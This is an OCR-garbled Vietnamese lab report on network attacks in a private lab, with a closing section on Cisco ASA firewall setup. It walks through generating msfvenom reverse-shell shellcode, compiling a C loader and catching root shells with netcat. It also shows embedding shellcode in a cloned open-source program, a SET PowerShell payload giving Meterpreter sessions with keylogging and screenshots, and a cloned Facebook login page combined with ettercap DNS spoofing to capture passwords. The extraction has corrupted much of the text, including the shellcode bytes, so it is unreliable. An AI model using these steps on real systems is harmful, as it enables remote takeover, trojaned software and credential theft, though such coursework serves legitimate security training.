Thực hiện kết nối từ máy người quản trị

Hình 39. Thực hiện kết nối từ máy người quản trịBước 17: thực hiên kết nối đến mysql server từ máy người quản trị bằng navicat Bước 17: thực hiên kết nối đến mysql server từ máy người quản trị bằng navicat Cài đặt

# wget -q -O - http://www.navicat.com/download_linux_repo?lnx_repo=ubuntu | sudo tee / etc/apt/ sources.list.d/navicatmonitor.list

# sudo apt-get update

# sudo apt-get install navicatmonitor # sudo /etc/init.d/navicatmonitor start Truy cập 192.168.36.166:3000

Tiến hành cài đặt những thông tin cần thiết Inltlal Settlngs

Repository Database

DATABASE TYPE Q DATABASE NAME *

MySQL saigondb

HOST NAME * USERNAME*

127.0.0.1 nguyet

PORT* PASSVVORD

2001 •••

o Connection success!

< Back

Inltlal Settlngs Contirmation

Superuser Repository Database Application

USERNAME nguyet DATABASE TYPE MySQL PORT 3000 FULL NA ME nguyte HOST NAME 127.0.0.1 WEB URL h ttp ://192.168.36.166:3000 EMAIL PORT 2001 IPADDRESS o.o.o.o

MOBILE DATABASE NAME

salgondb

PASSVVORD USERNAME

nguyet PASSVVORD

< Back

Thực hiện xem database

<- Ị -> C* "tÍT 1 ® & 192.1ổ8.36.166:3000/confígurations/dataRepository - ® ứ III\ tũ = Trial wlll explre in 14 days Actlvate Tokens I BuyTokens I

4Ý’ Overview Alerts Query Analyzer

Replications Configurations A nguyte ▼ Help

Coníigurations Repository Database

Repository Database DATABASE TVPE MySQL HOSTNAME PORT 2001 DATABASE NAME saigondb USERNAME nguyet PASSVVORD Edit Settlngs

Help us improve Navicat Monitor

Send Interactlon and usage da ta to help us Linderstand Navicat Monitor more so we tan tontlnue to improve it. You can tưrn this off In About Page anytlme. Learn more

Hình 41. Thực hiện xem cơ sở dữ liệu trên navicat

LAB 3: THỰC HIỆN REVERSE TCP ĐẺ LẤY SHELL

1. Mục đích

Thực hiện lấy shell một máy chủ qua mạng bằng cách dùng reverse TCP và shellcode 2. Chuẩn bị và công cụ

Tên Hệ điều hành IP User

Máy attack Kali linux 192.168.36.155 Nguyet

Máy victim Ubuntu 192.168.36.166 Lab1server1

Bước 1: Tiến hành lấy shell bằng câu lệnh

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c -- platform linux --arch x64

Thay đổi địa chỉ IP và PORT

Bước 2: Chép shell vào file shell.c

Fì roo t @ kali: /hom e/ng uyet

File Actions Edit View Help

GNU nano 5.9 Shell.c

Qinclude <stdio.h>

Minclude <string.h> unsigned char shellcode[] =1

■\x6a\x29\x58\x99\x6a\x82\x5f\x6a\x81\x5e\x8f\x05\x48\x97\xMr "\xb9\x02\xO9\xl5\xb3\x7f\x01\x81\x81\x51\x48\x89\xe6\x6a\xl9" ■\x5a\x6a\x2a\x58\xef\x05\x6a\x03\x5.\x48\xff\xc.\x6a\x21\x58" "\x8f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f" •\x73\x68\x00\x53\x48\x89\xe7\x52\xS7\x48\x89\xe6\xef\x85"; int main(){

printf("Shell code lenght: %lu\n", strlen(shellcode));

int (*get_the_shell)() • (ĩnt(*)())shellcode; get_ĩhe_shell();

retũrn 0; ì

Hình 43. File shell.cBước 3: Biên dịch shell.c thành shell Bước 3: Biên dịch shell.c thành shell

® /ho<ne/nguyet

gcc ■ 1 ! execstack Shell,. c Shell

/hooe/nguyet

Hình 44. Biên dịch shell.cBước 4: Thực thi shell Bước 4: Thực thi shell

L ./Shell

Shell code lenght: 17 zsh: segmentatĩon íault ./shell

Hình 45. Thực thi shell trên máy attackBước 5: Mở handler bằng netcat Bước 5: Mở handler bằng netcat

® /hone/nguyet

nc vlp 5555 listening on [any] 5555 ...

Hình 46. Mở handler trên máy attack

Bước 6: Tiến hành lấy shellcode bằng câu lệnh sau đó lưu vào file getshell.c

139

® /hone/nguyet

msívẽnor Ìinux/x64/sheíl_reverse_tcp LHOST-192.168.36.155 LPORT=9999 c Xin

ux — arch X64

No encoder speciíied, outputting raw payload Payload size: 74 bytes

Final size of c íile: 335 bytes unsigned char buf[] •

■\x6a\x29\x58\x99\x6a\xO2\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48" "\xb9\x02\x00\x27\x0f\xc0\xa8\x24\x9b\x51\x48\x89\xe6\x6a\xio" "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58' -\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f' "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0F\x05";

Hình 47. Lấy shellcode trên máy attackBước 7: Biên dịch getshell.c thành getshell Bước 7: Biên dịch getshell.c thành getshell

® /hone/nguyet

t-B gcc execstack getshell.t geXĩhelt

Hình 48. Biên dịch shellcode đã lấy ở trênBước 8: Mở handler bằng netcat Bước 8: Mở handler bằng netcat

® /hoae/nguyet

nc -nvlp 9999 listening on [any] 9999 ...

connect to [192.168.36.155] írom (UNKNOWN) [192.168.36.166] 59096 whoami

root pwd

/hone/lablserverl ifconfig

etho Link encap:Ethernet HWaddr 00:0c:29:9i:44:ad

inet addr:192.168.36.166 Bcast:192.168.36.255 Mask:255.255.255.0 Ínet6 addr: fe80 ::20c:29ff:fe91:44ad/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metrỉc:! RX packets:672 errors:0 dropped:0 overruns:0 frame:0 TX packets:168 errors:0 dropped:0 overruns:0 carrier:0 coltisions:0 txqueuelen:1000

RX bytes:63421 (63.4 KB) TX bytes:18761 (18.7 KB)

Hình 49. Chép shellcode lên máy victimBước 10: Biên dịch và thực thi getshell Bước 10: Biên dịch và thực thi getshell

Hình 50. Biên dịch và thực thi shellcode trên máy victim

Bước 11: Quay lại máy attack , đã có kết nối từ máy victim và thực hiện chép file tcp_reverse.txt lên máy victim

root@ubuntu:/hocie/l.ablserverl# nano shelAcode.c

root@ubuntu:/home/l.ablserverl# gcc -fno-stack-protector -z execstack sh ellcode.c -o shellcode

*— nc -nvlp 9999 listening on [any] 9999 ...

connect to [192.168.36.155] írom (UNKNOWN) [192.168.36.166] 59096 whoami

root pwd

/home/lablserverl ỉfconfig

eth0 Link encap:Ethernet HIMaddr 0B:0c:29:91:44:ad

inet addr:192.168.36.166 Bcast:192.168.36.255 Mask:255.255.255.0 inetô addr: fe80 ::20C:29ff:fe91:44ad/64 Scope:Link

UP BROAOGAST RUNNING MULTICAST MTU:1500 Metric:! RX packets:672 errors:0 dropped:0 overruns:0 frame:0 TX packets:168 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000

RX bytes:63421 (63.4 KB) TX bytes:18761 (18.7 KB) lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0 Ĩnet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:65536 Metric:! RX packets:335 errors:0 dropped:0 overruns:0 frame:0 TX packets:335 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1

RX bytes:27151 (27.1 KB) TX bytes:27151 (27.1 KB) touch tcp_reverse.txt

Hình 51. Kiểm tra kết nối và chép file lên máy victimBước 12: Quay lại máy victim và đã có file tcp_reverse.txt Bước 12: Quay lại máy victim và đã có file tcp_reverse.txt

Hình 52. Kết quả file chép từ attack lên victim đã có

3. Tìm hiểu cách nhúng mọt getshell vào tập tin ứng dụng bất kì và thực thiBước 1: Tìm source code từ git về Bước 1: Tìm source code từ git về

root@ubuntu:/home/lablserverl# git clone https://github.corn/bapzz/Steganography-l In-C.gtt

Hình 53. Source code một ứng dung trên gitBước 2: Chép tất cá shellcode vào file đã clone về từ git Bước 2: Chép tất cá shellcode vào file đã clone về từ git

'root@ubuntu:/home/tablserverl/Steganography-In-C# nano steganography .c

root@ubuntu:/home/tablserverl/Steganography-In-C# gcc -fno-stack-protector -z ex ecstack steganography.c -o shetttest

root@ubuntu:/home/tablserverl/Steganography-In-C# ./shelltest MA HOA VA GIA MA ____________ PROGRAM____________________ _________MA HOA__________________ _________GIA MA________________________ _________END______ shettcode tength : 17_______________________________________________________________ Hình 55. Tiến hành thực thi ứng dụng đã nhúng shellcode trên máy vitcim Bước 4: Mở handler bằng netcat trên máy attack và đã có kết nối

Hình 54. Chép shellcode vào ứng dụng đã clone vềBước 3: Tiến hành thực thi trên máy victim Bước 3: Tiến hành thực thi trên máy victim

® /home/nguyet/c-steganography/Steganography-In-C

ne -nvlp 9999 listening on [any] 9999 ...

connect to [192.168.36.155] from (UNKNOWN) [192.168.36.166] 40700

Hình 56. Mở handler trên máy attack và đã có kết nối

LAB 4 : THỰC HIỆN TẤN CÔNG SOCIAL ENGINEERING THƯỜNG DÙNG TRONG APT

Mô hình

Tên Hệ điều hành IP User

Máy attack Kali linux 192.168.36.155 Nguyet

Máy victim Ubuntu 192.168.36.166 Lab1server1

1. Cài mã độc tấn công Social Engineering

Select from the menu:

1) Spear-Phishing Attack Vectors

2) Mebsite Attack Vectors

3) Iníectìous Medìa Generator

4) Create a Payload and Listener

5) Mass Mailer Attack

6) Arduĩno-Based Attack Vector

7) Bireless Access Poỉnt Attack Vector

8) QRCode Generator Attack Vector

9) Powershell Attack Vectors

10) Thỉrd Party Modules

99) Return back to the main menu. set> 9

The Powershell Attack Vector module allovưs you to create PowerShell speciíic attacks. These att acks will allow you to use PowerShell which is available by detault in all operating Systems wi ndows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and per íorming íunctions that do not get triggered by preventative technologies.

1) Powershell Alphanumeric Shellcode Injector

Hình 57. Chọn Powershell Attack Vectors

Sau đó, tiếp tục chọn Powershell Alphanumeric Shellcode Injector. Nhập địa chỉ IP của máy attacker để tiến hành tạo Virus tấn công. Sau đó chọn yes

The Pouíershell Attack Vector module allows you to create PowerShell specỉíic attacks. These att acks will allow you to ưse PowerShell which is available by detault in all operating Systems Wi ndows Vìsta and above. PowerShell provìdes a íruitíul landscape for deploying payloads and per íorming íunctions that do not get triggered by preventative technologies.

1) Powershell Alphanumeric Shellcode Injector

2) Powershell Reverse Shell

3) Powershell Bind Shell

4) Powershell Dump SAM Database

99) Return to Main Menu set:oowershell>l

Enter the IPAddress or DNS name for the reverse host: 192.168.36.155 set:powershell> Enter the port for the reverse [443]:443

[*] Prepping the payload for delivery and injecting alphanumeric shellcode ... [*] Generating x86-based powershell injection code ...

[*] Reverse_HTTPS takes a few seconds to calculate.. One moment.. No encoder speciíied, outputting raw payload

Payload size: 395 bytes Final size of c file: 1685 bytes

[*] Finĩshed generating powershell injection bypass. [*] Encoded to bypass execution restriction policy ...

[*] lí you want the powershell commands and attack, they are exported to /root/.set/reports/pow ershell/

set> Do you want to start the listener now [yes/no]: : yes

Bước 2: Copy file virus ra ngoài desktop đổi đuôi txt thanhg batBước 3: Trên máy victim tiến hành chạy fike virus Bước 3: Trên máy victim tiến hành chạy fike virus

Bước 4: Trên máy attacker tiến hành lấy thông tin từ máy victim bằng câu lệnh sessions -i

msf6 exploit( ) >

[*] started HTTP5 reverse handler on https://0.0.0.0:443

[!] https://0.0.0.0:443 handling reqưest írom 192.168.36.172; (UUID: 16fcjjitfl) without a databa se connected that payload UUID tracking will. not work!

[*] https://0.0.0.0:443 handling request írom 192.168.36.172; (UUID: l6fcjjwl) staging x86 payl oad (176220 bytes) ...

[!] https://®.0.0.0:443 handling request from 192.168.36.172; (UUID: I6fcjjwl) without a databa

se connected that payload UUID trackĩng will not work!

[*] Meterpreter sessỉon 1 apened (192.168.36.155:443 -* 127.0.0.1 ) at 2022-03-17 07:34:46 -040 0

[!] https://0.0.0.0:443 handling request írom 192.168.36.172; (UUID: 1.6fcjjwl) Without a databa se connected that payload UUID tracking witl not work!

[*J https://0.0.0.0:443 handling reqưest from 192.168.36.172; (UUID: 16fcjjwl) staging x86 payl oad (176220 bytes) ...

[!] https;//0.0.0.0:443 handling request írom 192.168.36.172; (UUID: l6fciiwl) without a databa

se connected that payload UUID tracking win. not work!

[*] Meterpreter session 2 opened (192.168.36.155:443 -» 127.0.0.1 ) at 2022-03-17 07:35:04 -040 ẽ

msf6 exploití ) > sessions -ĩ

Active sessions

Hình 59. Lấy thông tin từ máy nạn nhân Lệnh sysinfo và ipcofigId Name Type

1 meterpreter x86/wỉndows 2 meterpreter x86/wifidows Information DESKTOP-EPFSOĐJ\LENQVO a DE SKTOP-EPFSODJ Connection 192.168.36.155:443 -* 127.0 .0.1 (192.168.36.172) 192.168.36.155:443 127.0

meĩeroreter > sysinto

Computer : DESKTOP-EPFSODJ

05 : Windows 10 (10.0 Buitd 18363).

Archĩtecture : X86 System Language : en_us

ũómain : WORKGROUP

Logged On Users : 2 Meterpreter : x86/windows meterpreter > ipconíig Interface 1

Natne : Software Loopback Interíace 1

Hardware MAC : 00:00:00:60:00:00 MTU : 4294967295 ĨPv4 Address : 127.0.0.1 ĨPv4 Netmask : 255.0.0.0 IPv6 Address : ::1 IPv6 Netmask : Interíace 4

Name : Intel(R) 82574L Gigabit Network Connection

Hardware MAC : 00:0c:29:cb:dc:89

MTU : 1500

Hình 60. Lệnh sysinfo Lệnh keyscan_start để tiến hành lấy dữ liệu từ máy victim Intertace 4

Intel(R) 82574L Gigabit Network Connection 00:0c:29:cb:dc:89 1500 192.168.36.172 255.255.255.0 fe80:: e4c2:c8bó:c52e:e533 keuscan start

Unknown command: keuscanstart meterpreter > keyscan_start

starting the keystroke sniffer ... meterpreĩer > keyscan_dump Dutnping captured keystrokes ... meterpreter > keyscan_stop stoppĩng the keystroke sniffer ... meterpreter > screenshot

Screenshot saved to: /usr/share/set/QhHSIIkV.ipeg meterpreter > I

Lệnh keyscan_dump để lấy dữ liệu từ máy victim Lệnh keyscan_stop để dừng lại

Lệnh screenshoot để chụp lại màn hình của máy victim 2. Demo tấn công bằng cách clone 1 link giả mạo Name Hardware MAC MTU IPv4 Address ĨPv4 Netmask IPv6 Address IPv6 Netmask lĩieterpreter >

Bước 1:Khởi động setoolkit để dùng công cụ Social-Engineering AttacksChọn mục Website Attack Vectors Chọn mục Website Attack Vectors

Setect from the menu:

1) Spear-Phishing Attack Vectors

2) Website Attack Vectors

3) Iníectious Media Generator

4) Create a Payload and Listener

5) Mass Mdiler Attack

6) Arduino-Based Attack Vector

7) Híreless Access Point Attack Vector

8) QRCode Generator Attack Vector

9) Powershell Attack Vectors

10) Third Party Mũdules

99) Return back to the main menu. set> 2

Hình 61. Chọn Website Attack Vectors Bước 2: Chọn mục Credential Havrester Attack Method

1) Java Applet Attack Methũd

2) Metasploit Browser Exploit Method

3) Credential Harvester Attack Method

4) Tabnabbing Attack Method

5) Web Jacking Attack Method

6) Multi-Attack Web Method

7) HTA Attack Method

99) Return to Main Menu set:webattack>5

Hình 62. Chọn Credential Havrester Attack Bước 3: Chọn mục site cloner

—I UIILLlUlldLlLy .---

1) Web Templates 2) Site Cloner 3) Custom Import

99) Return to Mebattack Menu

set:webattack>2

Bước 4: Nhập địa chỉ IP của máy attack

set:webattack> IP address for the PŨST back in Harvester/Tabnabbing [192.168.36.155]:192.168.36 .155

[-] SET supports both HTTP and HTTPS [-] Example: http://viMMi.thisisafakesite.coin

set:webaĩtack> Enter the url to clone: V1MMI. facebook.com [*] cloning the website: https://login.íacebook.com/login.php [*] This could take a Little bit ...

Hình 64. Nhập IP máy attacker PARAM: signed_next= PARAM: trynum=l PARAM: timezone= PARAM: Lgndim= PARAM: lgnrnd=204516_UElT PARAM: lgnjs=n

PARAM: pref itl._contact_poínt» PARAM: prefill-SOurce* PARAN: prefill_type= PARAM: first_prefill_source= PARAM: first_prefill_type=

Hình 65. Thông tin lấy được từ máy victim

® /home/nguyet

ettercap ethB dns_spoof aro ///

ettercap 0.8.3.1 Copyright 2001-2020 Ettercap Development Team Lỉstenỉng on:

eth0 00:0C:29:CD:E6:F1 192.168.36.155/255.255.255.0 fe80 ::20c:29ff:fecd:e6fl/64

SSL dissection needs a vatid ■redir_command_on■ scrỉpt in the etter.conf file

Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0. Prỉvileges dropped to EUID 0 EGID 0 ...

dns_spoof: etter.dns:62 Unknown record type PRT 34 plugins

42 protocol dissectors 57 ports monitored 28230 mac vendor fingerprint 1766 tcp os íingerprínt 2182 known Services

Lua: no Scripts were specified, not starting up! Chạy giả mạo website

Thông tin user và password lấy từ máy nạn nhân

root@>kalĩ: /home/nguyet

File Actions Edit View Help

GROUP 2 : ANY (all the hosts in the lỉst) starting Unified sniffing ...

Text only Interíace activated ... Hit ’ h' for inline hetp

Activatĩng dns_spoof plugin ...

dns_spoof: A [login.facebook.com] spooíed to [192.168.36.155] TTL [3600 s] dns_spoof: A [facebook.com] spooíed to [192.168.36.155] TTL [3600 s] ĐHCP: [00:0C:29:CD:E6:Fl] REQUEST 192.168.36.155

DHCP: [192.168.36.254] ACK : 192.168.36.155 25S.255.255.0 GW 192.168.36.2 DNS 192.168.36.2 "loc aldomain"

HTTP : 192.168.36.155:80 -> USER: testl9 PASS: 123 INEO: http://192.168.36.155/index2.htinl

CONTENT: jazoest=2104861sđ=AVruJlhLctY&display=&isprivate=&return_session=&skip_apĩ_login=&sĩgn ed_next=&trynum=l&timezone=&lgndifn=&lgnrnd=2®4516_UElT&lgnjs=n&email=testl9&pa5s=1236togin=16pr efìll_contact_point=&prefill_source=&prefill_type=&first_prefill_source=&first_prefíll_type=&ha

d_cp_prefìlled=false&had_password_prefilled=false&ab_test_data= dns_spoof: A [login.facebook.com] spooíed to [192.168.36.155] TTL [3600 s] dns_spoof: A [facebook.com] spooíed to [192.168.36.155] TTL [3600 s]

HTTP : 192.168.36.155:80 -í USER: admin PASS: 123 INFO: http://192.168.36.155/index2.html

CONTENT: jazoest=21048&lsd=AVruJlhLctY5dÌ5play=&isprivate=&return_5e55Ìon=&5kip_api_login=&5Ìgn ed_next=&trynum=l&tỉmezone=&lgiidÌ!n=&lgrirnd=204516_UElT&lgnj s=n&email=admin&pass=123&login=l&pre

fill_contact_point=&prefill_source=&prefill_type=&first_prefill_source=&first_prefill_type=&had _cp_prefilled=false&had_password_prefỉlted=false&ab_test_data=

dns_spoof; A [login.facebook.com] spooíed to [192.168.36.155] TTL [3600 s] I

Hình 66. Khi máy nạn nhân đăng nhập vào website giả mạo, máy attack có thể lấy được username và pasword

LAB 6 : CONFIG ASA BACSICYêu cầu: Yêu cầu:

1. Kết nối và cấu hình địa chỉ IP thiết bị theo mô hình

2. Cấu hình định tuyến trên FW và router R2 , đảm bảo người dùng trong vùng inside cóthể giao tiếp được với các server vùng DMZ thể giao tiếp được với các server vùng DMZ

3. Cấu hình FW chỉ cho phép PC với IP 192.168.2.10 được phép SSH vào FW

4. Cấu hình static NAT trên FW sao cho người dùng ngoài inetrnet chí có thể truy cập được dịch vụ Remote Desktop của server 192.168.10.10

5. Cấu hình PAT trên FW sao cho người dùng từ vùng inside có thể truy cập được các dịch vụ ngoài internet

Hình 67. Mô hình ASA

1. Cấu hình thông tin trên các cổng của FWCổng inside Cổng inside

ciscoasa(config)# interface eO ciscoasa(config-if) # nameií inside

INFO: Securitỵ level for "inside" set to 100 bỵ default. ciscoasa(config-if)# security-level 100

ciscoasa(config-if)# ip address 192.168.0.1 255.255.255.0

ciscoasa(config-if)# r

Hình 68. Thông tin cấu hình trên cổng inside Cổng DMZ

ciscoasa(config)# interface e2 ciscoasa(config-if) # nameif DMZ

INFO: Security level for "DMZ" set to 0 by default.

ciscoasa(config-if)# security-level 50

ciscoasa(config-if)# ip address 192.168.10.1 255.255.255.0

ciscoasa(config-if)# I

Hình 69. Thông tin cấu hình trên cổng DMZ Cổng outside

ciscoasa(config)# interface el ciscoasa(config-if)# nameif outside

ciscoasa(config-if)# securiity-level 0

A

ERROR: % Invalid input detected at 'A' marker.

ciscoasa(config-if)# security-level 0

ciscoasa(config-if)# ip address dhcp setroute

ciscoasa(config-if)# I

Hình 70. Thông tin cấu hình trên cổng outside 2. Cấu hình định tuyến

Cấu hình default-route trên router R2 Cấu hình static route trên FW

ciscoasa(config)# route inside 192.168.2.0 255.255.255.0 192.168.0.254

ciscoasa(coníig)# I_____________________________________________________

Hình 71. Thông tin cấu hình static route trên FW Mặc định ASA không cho phép icmp giữa các vùng, cần cấu hình thêm: ciscoasa(config)# policy-map global_policỵ

ciscoasa(config-pmap)# class inspection_default

ciscoasa(config-pmap-c)# inspect icmp

ciscoasa(config-pmap-c)# I

Hình 72. Thông tin cấu hình icmp trên FW 3. Cấu hình SSH trên FW

ciscoasa(coníig)# User waren password waren

ciscoasa(coníig)# crỵpto keỵ generate rsa general-keys INFO: The nante for the keỵs will be: <Default-RSA-Keỵ> Keỵpair generation process begin. Please wait...

ciscoasa(config)# ssh 192.168.2.10 255.255.255.255.inside

ERROR: % Invalid input detected at ’A' marker.

ciscoasa(coníig)# ssh 192.168.2.10 255.255.255.255 inside ciscoasa(coníig)# ssh version 2

ciscoasa(config)# aaa authentication ssh console LOCAL

ciscoasa(config)# I________________________________________

Sau đó ta có thể truy cập SSH từ PC 192.168.2.10

Hình 74. Kết quả SSH vào FW trên ( PC 192.168.2.10)

4. Cấu hình static NAT và ACL để cho từ bên ngoài có thể truy cập dịch vụ RemoteDesktop trên vùng DMZ Desktop trên vùng DMZ

Bước 1: Cấu hình object network:

ciscoasa(config)# object network DMZ_10.10

ciscoasa(config-network-object)# host 192.168.10.10

ciscoasa (confiq-network-ob~iect) # Ễ________________

Hình 75. Thông tin cấu hình object network Bước 2: Cấu hình object service:

ciscoasa(config-network-object)# object Service RDP

ciscoasa(config-service-object)# Service tcp source eq 3389

ciscoasa(config-service-object)# I

Hình 76. Thông tin cấu hình object service

Bước 3: Cấu hình NAT và cấu hình ACL để cho phép truy cập từ outside vào DMZ